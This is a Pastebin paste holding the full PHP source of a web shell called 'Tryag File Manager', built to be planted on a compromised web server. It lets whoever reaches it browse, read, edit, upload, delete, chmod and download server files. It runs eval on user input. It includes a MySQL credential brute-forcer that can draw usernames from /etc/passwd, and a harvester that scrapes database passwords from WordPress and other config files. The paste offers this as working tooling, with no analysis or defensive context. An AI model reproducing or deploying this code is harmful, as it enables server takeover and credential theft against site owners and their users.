API tools faq
paste
Advertisement
abdo53

Untitled

abdo53
May 18th, 2017
84
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.08 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. extract(start());
  5. if(get_magic_quotes_gpc()){
  6. foreach($_POST as $key=>$value){
  7. $_POST[$key] = stripslashes($value);
  8. }
  9. }
  10. $_POST['path'] = (isset($_POST['path'])) ? g22b_crypt($_POST['path'],'de') : false;
  11. $_POST['name'] = (isset($_POST['name'])) ? g22b_crypt($_POST['name'],'de') : false;
  12. if(isset($_GET['option']) && $_POST['opt'] == 'download'){
  13. header('Content-type: text/plain');
  14. header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
  15. echo(file_get_contents($_POST['path']));
  16. exit();
  17. }
  18. echo '<!DOCTYPE html>
  19. <html>
  20. <head>
  21. <title>Tryag File Manager</title>
  22. <meta name="robots" content="noindex" />
  23. <style>
  24. body{
  25. font-family: "Racing Sans One", cursive;
  26. background-color: #e6e6e6;
  27. text-shadow:0px 0px 1px #757575;
  28. margin: 0;
  29. }
  30. #container{
  31. width: 700px;
  32. margin: 20px auto;
  33. border: 1px solid black;
  34. }
  35. #header{
  36. text-align: center;
  37. border-bottom: 1px dotted black;
  38. }
  39. #header h1{
  40. margin: 0;
  41. }
  42.  
  43. #nav,#menu{
  44. padding-top: 5px;
  45. margin-left: 5px;
  46. padding-bottom: 5px;
  47. overflow: hidden;
  48. border-bottom: 1px dotted black;
  49. }
  50. #nav{
  51. margin-bottom: 10px;
  52. }
  53.  
  54. #menu{
  55. text-align: center;
  56. }
  57.  
  58. #content{
  59. margin: 0;
  60. }
  61.  
  62. #content table{
  63. width: 700px;
  64. margin: 0px;
  65. }
  66. #content table .first{
  67. background-color: silver;
  68. text-align: center;
  69. }
  70. #content table .first:hover{
  71. background-color: silver;
  72. text-shadow:0px 0px 1px #757575;
  73. }
  74. #content table tr:hover{
  75. background-color: #636263;
  76. text-shadow:0px 0px 10px #fff;
  77. }
  78.  
  79. #footer{
  80. margin-top: 10px;
  81. border-top: 1px dotted black;
  82. }
  83. #footer p{
  84. margin: 5px;
  85. text-align: center;
  86. }
  87. .filename,a{
  88. color: #000;
  89. text-decoration: none;
  90. cursor: pointer;
  91. }
  92. .filename:hover,a:hover{
  93. color: #fff;
  94. text-shadow:0px 0px 10px #ffffff;
  95. }
  96. .center{
  97. text-align: center;
  98. }
  99. input,select,textarea{
  100. border: 1px #000000 solid;
  101. -moz-border-radius: 5px;
  102. -webkit-border-radius:5px;
  103. border-radius:5px;
  104. }
  105. </style>
  106. <script>
  107. function Encoder(name)
  108. {
  109. var e = document.getElementById(name);
  110. e.value = btoa(e.value);
  111. return true;
  112. }
  113. </script>
  114. </head>
  115. <body>
  116.  
  117. <div id="container">
  118. <div id="header"><h1>Tryag File Manager</h1></div>
  119. <div id="menu"><a href="?path='.$currentpathen.'">Home</a> || <a href="?path='.$currentpathen.'&cpanel">Turbo Force</a> || <a href="?path='.$currentpathen.'&cpanelconf">B-F Config_Cpanel</a></div>
  120. <div id="nav">
  121. <div class="path">Current Path : '.nav_link().'
  122. <form methdo="GET" onSubmit="Encoder(\'c\');"><font color=red>Or</font> Select Your Path : <input type="text" id="c" size="40" name="path" value="'.$currentpath.'" /><input type="submit" value="Go" /></form></div><br />
  123. <div class="upload">
  124. <form enctype="multipart/form-data" method="POST" action="?path='.$currentpathen.'&up">
  125. Upload File : <input type="file" name="file" />
  126. <input type="submit" value="upload" />
  127. </form>
  128. </div>
  129. <div class="new">
  130. <form method="POST" action="?path='.$currentpathen.'&new" onSubmit="Encoder(\'kc\')">
  131. <span>New : </span><input name="name" type="text" size="10" id="kc" />
  132. File <input type="radio" name="type" value="file" checked/>
  133. Dir <input type="radio" name="type" value="dir" />
  134. <input type="submit" value="Create" />
  135. </form>
  136. </div>
  137. </div>
  138. <div id="content">';
  139. if(isset($_GET['cpanel'])){
  140. if(isset($_POST['usernames']) && isset($_POST['passwords'])){
  141. $usernames = base64_decode($_POST['usernames']);
  142. $passwords = base64_decode($_POST['passwords']);
  143.  
  144. $count = 0;
  145. foreach(explode("\n",$usernames) as $username){
  146. $username = ($_POST['type'] == 'simple') ? $username : passwdtouser($username);
  147. foreach(explode("\n",$passwords) as $password){
  148. $username = trim($username);
  149. $password = trim($password);
  150. $co = mysql_connect('localhost',$username,$password);
  151. if($co){
  152. mysql_close($co);
  153. echo "Tryag~ Username (<font color=red>$username</font>) Password (<font color=red>$password</font>)<br />";
  154. $count++;
  155. }
  156. }
  157. }
  158. echo "$count Usernames Founded.";
  159. }else{
  160. echo '<form method="POST" onSubmit="Encoder(\'userc\');Encoder(\'passc\');">
  161. Usernames : <br />
  162. <textarea cols=84 rows=10 id="userc" name="usernames"></textarea><br />
  163. Passwords : <br />
  164. <textarea cols=84 rows=10 id="passc" name="passwords"></textarea><br />
  165. Usernames Type : Simple : <input type="radio" name="type" value="simple" checked="checked"> - /etc/passwd : <input type="radio" name="type" value="pass">
  166. <br /><input type="submit" value="Go">
  167. </form>';
  168. }
  169. }elseif(isset($_GET['cpanelconf'])){
  170. if(isset($_POST['link'])){
  171. if(file_get_contents($_POST['link'])){
  172. $count = 0;
  173. foreach(get_data($_POST['link']) as $info){
  174. $co = mysql_connect('localhost',$info[0],$info[1]);
  175. if($co){
  176. echo "Tryag~ Username (<font color=red>$info[0]</font>) Password (<font color=red>$info[1]</font>)<br />";
  177. mysql_close($co);
  178. }
  179. }
  180. }else{
  181. echo "<font color=red>Invalid Link Try Again.</font>";
  182. }
  183. }
  184. echo '<form method="POST">
  185. Configs Link : <input name="link" type="text" value="http://wwww." size="40" />
  186. <input type="submit" value="start" />
  187. </form>';
  188. }else{
  189.  
  190. if(isset($_GET['filesrc'])){
  191. $file = g22b_crypt($_GET['filesrc'],'de');
  192. echo '<div class="center">'.htmlspecialchars($file).'</div><textarea cols="84" rows="25">'.filesrc($file).'</textarea></pre>';
  193. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete' || (isset($_GET['new']) && $_POST['type'] == 'file')){
  194.  
  195. echo '<div class="center">'.$_POST['name'].'<br />';
  196.  
  197. if($_POST['opt'] == 'chmod'){
  198. if(isset($_POST['perm'])){
  199.  
  200. eval('$perm = '.$_POST['perm'].';');
  201. if(chmod($_POST['path'],$perm)){
  202. echo '<font color="green">Change Permission Done.</font><br />';
  203. $permdone = true;
  204. }else{
  205. echo '<font color="red">Change Permission Error.</font><br />';
  206. }
  207. }
  208. if($permdone){
  209. $perm = $_POST['perm'];
  210. }else{
  211. $perm = substr(sprintf('%o', fileperms($_POST['path'])), -4);
  212. }
  213.  
  214. echo '<form method="POST">
  215. Permission : <input name="perm" type="text" size="4" value="'.$perm.'" />
  216. <input type="hidden" name="path" value="'.g22b_crypt($_POST['path'],'en').'">
  217. <input type="hidden" name="name" value="'.g22b_crypt($_POST['name'],'en').'">
  218. <input type="hidden" name="opt" value="chmod">
  219. <input type="submit" value="Go" />
  220. </form>';
  221. }elseif($_POST['opt'] == 'rename'){
  222.  
  223. if(isset($_POST['newname'])){
  224. if(rename($_POST['path'],$currentpath.'/'.$_POST['newname'])){
  225. echo '<font color="green">Change Name Done.</font><br />';
  226. $_POST['name'] = $_POST['newname'];
  227. }else{
  228. echo '<font color="red">Change Name Error.</font><br />';
  229. }
  230. }
  231.  
  232. echo '<form method="POST">
  233. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  234. <input type="hidden" name="path" value="'.g22b_crypt($_POST['path'],'en').'">
  235. <input type="hidden" name="name" value="'.g22b_crypt($_POST['name'],'en').'">
  236. <input type="hidden" name="opt" value="rename">
  237. <input type="submit" value="Go" />
  238. </form>';
  239. }elseif($_POST['opt'] == 'edit' || isset($_GET['new'])){
  240. if(isset($_POST['src'])){
  241. $fp = fopen($_POST['path'],'w');
  242. if(fwrite($fp,base64_decode($_POST['src']))){
  243. echo '<font color="green">Edit File Done.</font><br />';
  244. $done = true;
  245. }else{
  246. echo '<font color="red">Edit File Error.</font><br />';
  247. }
  248. fclose($fp);
  249. }
  250. if(isset($_GET['new']) && !$done){
  251. $filecontent = '';
  252. $_POST['path'] = "$currentpath/$_POST[name]";
  253. }else{
  254. $filecontent = filesrc($_POST['path']);
  255. }
  256. echo '<form method="POST" onSubmit="Encoder(\'cc\')">
  257. <textarea cols="84" rows="25" name="src" id="cc">'.$filecontent.'</textarea><br />
  258. <input type="hidden" name="path" value="'.g22b_crypt($_POST['path'],'en').'">
  259. <input type="hidden" name="name" value="'.g22b_crypt($_POST['name'],'en').'">
  260. <input type="hidden" name="type" value="file" />
  261. <input type="hidden" name="opt" value="edit">
  262. <input type="submit" value="Go" />
  263. </form>';
  264. }
  265.  
  266. echo '</div>';
  267. }else{
  268. echo '<div class="center">';
  269. if($_POST['opt'] == 'delete'){
  270. if($_POST['type'] == 'dir'){
  271. if(rmdir($_POST['path'])){
  272. echo '<font color="green">Delete Dir Done.</font><br />';
  273. }else{
  274. echo '<font color="red">Delete Dir Error.</font><br />';
  275. }
  276. }elseif($_POST['type'] == 'file'){
  277. if(unlink($_POST['path'])){
  278. echo '<font color="green">Delete File Done.</font><br />';
  279. }else{
  280. echo '<font color="red">Delete File Error.</font><br />';
  281. }
  282. }
  283. }elseif($_POST['type'] == 'dir' && isset($_GET['new'])){
  284. if(mkdir("$currentpath/$_POST[name]")){
  285. echo '<font color="green">Create Dir Done.</font><br />';
  286. }else{
  287. echo '<font color="red">Create Dir Error.</font><br />';
  288. }
  289. }elseif(isset($_FILES['file'])){
  290. $userfile_name = $currentpath.'/'.$_FILES['file']['name'];
  291. $userfile_tmp = $_FILES['file']['tmp_name'];
  292. if(move_uploaded_file($userfile_tmp,$userfile_name)){
  293. echo '<font color="green">File Upload Done.</font><br />';
  294. }else{
  295. echo '<font color="red">File Upload Error.</font><br />';
  296. }
  297. }
  298. echo '</div><table>
  299. <tr class="first">
  300. <td>Name</td>
  301. <td>Size</td>
  302. <td>Permissions</td>
  303. <td>Options</td>
  304. </tr>';
  305.  
  306. $dirs = getfiles('dir');
  307. foreach($dirs as $dir){
  308. echo '<div id="dirs"><tr>
  309. <td><a href="?path='.$dir['link'].'"><div class="filename">'.$dir['name'].'</div></a></td>
  310. <td class="center">'.$dir['size'].'</td>
  311. <td class="center"><font color="'.$dir['permcolor'].'">'.$dir['perm'].'</font></td>
  312. <td class="center"><form method="POST" action="?path='.$currentpathen.'&option">
  313. <select name="opt">
  314. <option value=""></option>
  315. <option value="delete">Delete</option>
  316. <option value="chmod">Chmod</option>
  317. <option value="rename">Rename</option>
  318. </select>
  319. <input type="hidden" name="type" value="dir">
  320. <input type="hidden" name="name" value="'.g22b_crypt($dir['name'],'en').'">
  321. <input type="hidden" name="path" value="'.$dir['link'].'">
  322. <input type="submit" value=">" />
  323. </form></td>
  324. </tr>
  325. </div>';
  326. }
  327. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  328.  
  329. $files = getfiles('file');
  330. foreach($files as $file){
  331. echo '<div id="files">
  332.  
  333. <tr>
  334. <td><a href="?path='.$currentpathen.'&filesrc='.$file['link'].'"><div class="filename">'.$file['name'].'</div></a></td>
  335. <td class="center">'.$file['size'].'</td>
  336. <td class="center"><font color="'.$file['permcolor'].'">'.$file['perm'].'</font></td>
  337. <td class="center"><form method="POST" action="?path='.$currentpathen.'&option">
  338. <select name="opt">
  339. <option value=""></option>
  340. <option value="delete">Delete</option>
  341. <option value="chmod">Chmod</option>
  342. <option value="rename">Rename</option>
  343. <option value="edit">Edit</option>
  344. <option value="download">Download</option>
  345. </select>
  346. <input type="hidden" name="type" value="file">
  347. <input type="hidden" name="name" value="'.g22b_crypt($file['name'],'en').'">
  348. <input type="hidden" name="path" value="'.$file['link'].'">
  349. <input type="submit" value=">" />
  350. </form></td>
  351. </tr></div>';
  352. }
  353. echo '</table>';
  354. }
  355. }
  356. echo '
  357. </body>
  358. </html>';
  359.  
  360. function getfiles($type){
  361. global $currentpath;
  362. $dir = scandir($currentpath);
  363. $result = array();
  364. foreach($dir as $file){
  365. $current['fullname'] = "$currentpath/$file";
  366. if($type == 'dir'){
  367. if(!is_dir($current['fullname']) || $file == '.' || $file == '..') continue;
  368. }elseif($type == 'file'){
  369. if(!is_file($current['fullname'])) continue;
  370. }
  371.  
  372. $current['name'] = $file;
  373. $current['link'] = g22b_crypt($current['fullname'],'en');
  374. $current['size'] = (is_dir($current['fullname'])) ? '--' : file_size($current['fullname']);
  375. $current['perm'] = perms($current['fullname']);
  376. if(is_writable($current['fullname'])){
  377. $current['permcolor'] = 'green';
  378. }elseif(is_readable($current['fullname'])){
  379. $current['permcolor'] = '';
  380. }else{
  381. $current['permcolor'] = 'red';
  382. }
  383.  
  384. $result[] = $current;
  385.  
  386. }
  387. return $result;
  388. }
  389. function start(){
  390. global $_POST,$_GET;
  391.  
  392. $result['currentpath'] = (isset($_GET['path'])) ? g22b_crypt($_GET['path'],'de') : cwd();
  393. $result['currentpathen'] = (isset($_GET['path'])) ? $_GET['path'] : g22b_crypt(cwd(),'en');
  394.  
  395. return $result;
  396. }
  397. function file_size($file){
  398. $size = filesize($file)/1024;
  399. $size = round($size,3);
  400. if($size >= 1024){
  401. $size = round($size/1024,2).' MB';
  402. }else{
  403. $size = $size.' KB';
  404. }
  405. return $size;
  406. }
  407. function g22b_crypt($txt,$type){
  408. if(function_exists('base64_encode') && function_exists('base64_decode')){
  409. return ($type == 'en') ? base64_encode($txt) : base64_decode($txt);
  410. }elseif(function_exists('strlen') && function_exists('dechex') && function_exists('ord') && function_exists('chr') && function_exists('hexdec')){
  411. return ($type == 'en') ? strToHex($txt) : hexToStr($txt);
  412. }else{
  413. $ar1 = array('public_html','.htaccess','/','.');
  414. $ar2 = array('bbbpubghostbbb','bbbhtaghostbbb','bbbsghostbbb','bbbdotghostbbb');
  415. return ($type == 'en') ? str_replace($ar1,$ar2,$txt) : str_replace($ar2,$ar1,$txt);
  416. }
  417. }
  418. function strToHex($string){
  419. $hex='';
  420. for ($i=0; $i < strlen($string); $i++)
  421. {
  422. $hex .= dechex(ord($string[$i]));
  423. }
  424. return $hex;
  425. }
  426. function hexToStr($hex){
  427. $string='';
  428. for ($i=0; $i < strlen($hex)-1; $i+=2)
  429. {
  430. $string .= chr(hexdec($hex[$i].$hex[$i+1]));
  431. }
  432. return $string;
  433. }
  434. function nav_link(){
  435. global $currentpath;
  436. $path = $currentpath;
  437. $path = str_replace('\\','/',$path);
  438. $paths = explode('/',$path);
  439. $result = '';
  440. foreach($paths as $id=>$pat){
  441. if($pat == '' && $id == 0){
  442. $a = true;
  443. $result .= '<a href="?path='.g22b_crypt("/",'en').'">/</a>';
  444. continue;
  445. }
  446. if($pat == '') continue;
  447. $result .= '<a href="?path=';
  448. $linkpath = '';
  449. for($i=0;$i<=$id;$i++){
  450. $linkpath .= "$paths[$i]";
  451. if($i != $id) $linkpath .= "/";
  452. }
  453. $result .= g22b_crypt($linkpath,'en');
  454. $result .= '">'.$pat.'</a>/';
  455. }
  456. return $result;
  457. }
  458. function filesrc($file){
  459. return htmlspecialchars(file_get_contents($file));
  460. }
  461. function cwd(){
  462. if(function_exists('getcwd')){
  463. return getcwd();
  464. }else{
  465. $e = str_replace("\\","/",$path);
  466. $e = explode('/',$path);
  467. $result = '';
  468. for($i=0;$i<count($e)-1;$i++){
  469. if($e[$i] == '') continue;
  470. $result .= '/'.$e[$i];
  471. }
  472. return $result;
  473. }
  474. }
  475. function passwdtouser($line){
  476. $user = explode(':',$line);
  477. return $user[0];
  478. }
  479. function ex($a,$b,$text){
  480. $explode = explode($a,$text);
  481. $explode = explode($b,$explode[1]);
  482. return trim($explode[0]);
  483. }
  484. function get_data($url){
  485. $ar = array('1.txt','2.txt','3.txt','4.txt','5.txt','6.txt','7.txt','8.txt','9.txt','0.txt');
  486. $src = file_get_contents($url);
  487. $files = explode('<a href="',$src);
  488. $data = array();
  489. foreach($files as $id=>$file){
  490. if($id == 0) continue;
  491. $file = explode('">',$file);
  492. $file = trim($file[0]);
  493. if(!eregi('.txt',$file)) continue;
  494. $src = file_get_contents("$url/$file");
  495. if(!$src) continue;
  496. $user = str_replace($ar,'',$file);
  497. $user = str_replace($ar,'',$user.'.txt');
  498. $user = str_replace($ar,'',$user.'.txt');
  499. $user = trim(str_replace('.txt','',$user));
  500. if(eregi("WordPress",$src)){
  501. $pass = ex("define('DB_PASSWORD', '","');",$src);
  502. $data[] = array($user,$pass);
  503. }else{
  504. $tokens = token_get_all($src);
  505. foreach($tokens as $token){
  506. if(!$token[1]) continue;
  507. $tokenname = token_name($token[0]);
  508. if($tokenname != 'T_VARIABLE') continue;
  509. $var = $token[1];
  510. if(eregi('pass',$var)){
  511. $f = str_replace(' ','',ex($var,';',$src));
  512. $a = trim(ex("='","'",$f));
  513. $b = trim(ex('"','"',$f));
  514. if($a != ''){
  515. $pass = $a;
  516. }elseif($b != ''){
  517. $pass = $b;
  518. }
  519. if($pass == '') continue;
  520. $data[] = array($user,$pass);
  521. }
  522. }
  523. }
  524. }
  525. return $data;
  526. }
  527. function perms($file){
  528. $perms = @fileperms($file);
  529.  
  530. if (($perms & 0xC000) == 0xC000) {
  531. // Socket
  532. $info = 's';
  533. } elseif (($perms & 0xA000) == 0xA000) {
  534. // Symbolic Link
  535. $info = 'l';
  536. } elseif (($perms & 0x8000) == 0x8000) {
  537. // Regular
  538. $info = '-';
  539. } elseif (($perms & 0x6000) == 0x6000) {
  540. // Block special
  541. $info = 'b';
  542. } elseif (($perms & 0x4000) == 0x4000) {
  543. // Directory
  544. $info = 'd';
  545. } elseif (($perms & 0x2000) == 0x2000) {
  546. // Character special
  547. $info = 'c';
  548. } elseif (($perms & 0x1000) == 0x1000) {
  549. // FIFO pipe
  550. $info = 'p';
  551. } else {
  552. // Unknown
  553. $info = 'u';
  554. }
  555.  
  556. // Owner
  557. $info .= (($perms & 0x0100) ? 'r' : '-');
  558. $info .= (($perms & 0x0080) ? 'w' : '-');
  559. $info .= (($perms & 0x0040) ?
  560. (($perms & 0x0800) ? 's' : 'x' ) :
  561. (($perms & 0x0800) ? 'S' : '-'));
  562.  
  563. // Group
  564. $info .= (($perms & 0x0020) ? 'r' : '-');
  565. $info .= (($perms & 0x0010) ? 'w' : '-');
  566. $info .= (($perms & 0x0008) ?
  567. (($perms & 0x0400) ? 's' : 'x' ) :
  568. (($perms & 0x0400) ? 'S' : '-'));
  569.  
  570. // World
  571. $info .= (($perms & 0x0004) ? 'r' : '-');
  572. $info .= (($perms & 0x0002) ? 'w' : '-');
  573. $info .= (($perms & 0x0001) ?
  574. (($perms & 0x0200) ? 't' : 'x' ) :
  575. (($perms & 0x0200) ? 'T' : '-'));
  576.  
  577. return $info;
  578. }
  579. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!